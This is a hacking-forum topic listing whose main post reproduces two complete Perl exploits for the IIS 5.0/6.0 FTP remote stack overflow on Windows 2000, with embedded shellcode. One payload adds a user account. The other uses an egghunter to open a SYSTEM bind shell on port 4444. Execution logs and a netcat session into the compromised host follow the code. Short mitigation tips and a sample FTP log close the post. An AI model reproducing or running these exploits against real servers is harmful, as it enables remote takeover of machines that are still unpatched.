elhacker.net forum
Show Topics
1  Computer Security / Bugs and Exploits / MOVED: Spotify bug for premium on: 24 October 2011, 22:36
This topic has been moved to the Trash.

http://foro.elhacker.net/index.php?topic=342391.0
2  Computer Security / Bugs and Exploits / MOVED: exploits for Vista or 7? on: 4 January 2011, 11:21
This topic has been moved to Basic Hacking.

http://foro.elhacker.net/index.php?topic=315559.0
3  Computer Security / Web Level / Persistent XSS in Blogger, 28 DECEMBER 2010 on: 28 December 2010, 07:40
I just looked at my Twitter and they have posted this:

http://www.securitybydefault.com/2010/12/0day-xss-persistente-en-bloggercom-y.html

Hmm, now what would be the famous string that bypassed Blogger's filters?

Anyway, I'll find out eventually.

-berz3k.
4  Computer Security / Bugs and Exploits / Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploits (win2k sp4) on: 2 September 2009, 12:37
As we all know, the news of this new vulnerability is wreaking havoc on some networks. I have tested it in my small lab as a Proof of Concept; we necessarily need write privileges:

Exploit 1: This first version only adds a user (user: winown, pass: nwoniw) inside the shellcode.

Code:
#!/usr/bin/perl
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;                            
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

Execution:
Code:
C:\>perl -x exploit1.pl 192.168.1.68 192.168.1.100

IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2
220 win2k-pro Microsoft FTP Service (Version 5.0).
331 Anonymous access allowed, send identity (e-mail name) as password.
230 Anonymous user logged in.
257 "w00t20560" directory created.
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ┌▐┘r⌠[SYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHPDC0C0C0LKG5GLLKCLEUBXEQJOLKPOEHLKQOQ0C1JKG9LKGDLKC1JNP1IPLYNLLDIPD4C7IQIZDMC1IRJKL4GKQDFDC4CEJELKQOQ4C1JKCVLKDLPKLKQ
OELEQJKLKELLKEQJKK9QLFDDDHCQOFQL6CPPVE4LKPFP0LKG0DLLKBPELNMLKBHEXMYJXLCIPCZF0CXL0LJDDQOCXJ8KNMZDNPWKOJGBCBME4FNBED8CUGPFOE3GPBNBECDQ0D5D3E5D2Q0CGCYBNBOCGBNQ0BND7BOBNE9CGGPFOQQPDG4Q0FFQ6Q0BNBED4Q0B
LBOCSE1BLBGCBBOCEBPGPG1BDBME9BNBIBSCDCBE1D4BOCBCCGPBWE9BNBOBWBNGPFOG1QTQTC0AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
250 CWD command successful.
257 "CCC╕UURU5UUUU@8SEXYu≈@@@@ αC~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂EEEE▒⌠w~⌂HHHHIIII~
⌂JKKKΘc■  NNNN" directory created.
200 PORT command successful.
150 Opening ASCII mode data connection for file list.


Afterwards we can check whether we succeeded from within the FTP service itself:

Code:
C:\>ftp 192.168.1.68
Conectado a 192.168.1.68.
220 win2k-pro Microsoft FTP Service (Version 5.0).
Usuario (192.168.1.68:(none)): winown
331 Password required for winown.
Contraseña: nwoniw
230 User winown logged in.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
w00t20560
226 Transfer complete.
ftp: 11 bytes recibidos en 0.00 segundos 3.67 a Kbytes/s.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
08-31-09  07:41PM       <DIR>          w00t20560
226 Transfer complete.
ftp: 50 bytes recibidos en 0.00 segundos 50000.00 a Kbytes/s.
ftp>

The admin will notice a user created with privileges:




Exploit 2: This second "improved" exploit defines a bind shell on port 4444 inside the shellcode.

Code:
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt

use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
# ./msfpayload windows/shell_bind_tcp R |  ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";


print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip>\n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms

$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";

# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;                            
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = <$sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = <$sock>;
print $x;

print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

Execution:
Code:
C:\>perl -x exploit2.pl 192.168.1.68 192.168.1.100

IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2
220 win2k-pro Microsoft FTP Service (Version 5.0).
331 Password required for anonimoos.
500 'PASS T00WT00W┌▐╜-τ+╔▒V┘t$⌠ZΩⁿ1j♥j╧↕gw▌T}╣*☻⌡Φ@[☺q♦H≈⌂‼╜≈Np8∟f‼─_╗≤⌡╬≥2═!δV▄(WOk►/Ωσ⌡ⁿV╛Σ▌ⁿ▲1▼b_>δ►^"╪P╓Φτ\█ Z♦Z╣₧Γe+=Dφσt"Mmz→)♫╧Aε-▀╘☺u╗u‼╙jC╗╙.☼.HR'Σfm╖b▲
-⌐ѪwN╔╧└4▼/╚≥K⌂b╥≤r█!║"sz3J↕∙╗╡☻☻▬└♣╠B-u6╕R]φ♀╦╩lα8╣%vt╫≥yP╓-"4Ω4◄Z┴♀►┐▀`$Ω☺╖qIL-▲↓→$╩╖♣₧ΘJ╙┘ τ3U∟├#O►{╚↓╬=δ╕↓,nRu+o┐♥╙┴▬Rδφ■R►O┐⌂Z∩W&☼R:┘σCZ♀h░Bemⁿ─▼mα': com
mand not understood
331 Password required for anonimoos.
500 'PASS T00WT00W┌▐╜-τ+╔▒V┘t$⌠ZΩⁿ1j♥j╧↕gw▌T}╣*☻⌡Φ@[☺q♦H≈⌂‼╜≈Np8∟f‼─_╗≤⌡╬≥2═!δV▄(WOk►/Ωσ⌡ⁿV╛Σ▌ⁿ▲1▼b_>δ►^"╪P╓Φτ\█ Z♦Z╣₧Γe+=Dφσt"Mmz→)♫╧Aε-▀╘☺u╗u‼╙jC╗╙.☼.HR'Σfm╖b▲
-⌐ѪwN╔╧└4▼/╚≥K⌂b╥≤r█!║"sz3J↕∙╗╡☻☻▬└♣╠B-u6╕R]φ♀╦╩lα8╣%vt╫≥yP╓-"4Ω4◄Z┴♀►┐▀`$Ω☺╖qIL-▲↓→$╩╖♣₧ΘJ╙┘ τ3U∟├#O►{╚↓╬=δ╕↓,nRu+o┐♥╙┴▬Rδφ■R►O┐⌂Z∩W&☼R:┘σCZ♀h░Bemⁿ─▼mα': com
mand not understood
331 Anonymous access allowed, send identity (e-mail name) as password.
230 Anonymous user logged in.
257 "w00t26878" directory created.
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
500 'SITE KSEXYΓ▌┼┘r⌠_WYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIE6MQHJKODOG2F2BJC2F8HMFNGLEUQJD4JOH8F4P0FPPWLKKJNOD5JJNOCEKWKOM7AAVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV': command not understood
250 CWD command successful.
257 "CCC╕UURU5UUUU@8SEXYu≈@@@@ αC~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂~⌂EEEE▒⌠w~⌂HHHHIIII~
⌂JKKKΘc■  NNNN" directory created.
200 PORT command successful.
150 Opening ASCII mode data connection for file list.

C:\>nc -vvn 192.168.1.68 4444

(UNKNOWN) [192.168.1.68] 4444 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Awesome!


Links of interest:

Exploits:
http://www.milw0rm.com/exploits/9541
http://www.milw0rm.com/exploits/9559

Video demo from offensive-security:
http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/msftp.html

Best practices for MS FTP:
http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/7b4bdad5-9a0a-4bf6-8b00-41084b783e20.mspx?mfr=true

+FIX
- Well, there are few mitigating factors; it really comes down to preventing write access for "anonymous" users
- Turn off the FTP service if it is not needed
- Create ACLs for users and directories.



+Examine the LOG files

Usually at this path:
Code:
c:\winnt\system32\logfiles\MSFTPSVC1

The logs would look like this:

Code:
Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 1111-01-01 22:45:13
#Fields: time c-ip cs-method cs-uri-stem sc-status
22:45:13 169.254.117.152 [1]USER anonymous 331
22:45:13 169.254.117.152 [1]PASS password 230
22:45:13 169.254.117.152 [1]MKD JUNK@C~~~~~~~~~~~~~~~~~~~~


Have fun!

-berz3k.
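
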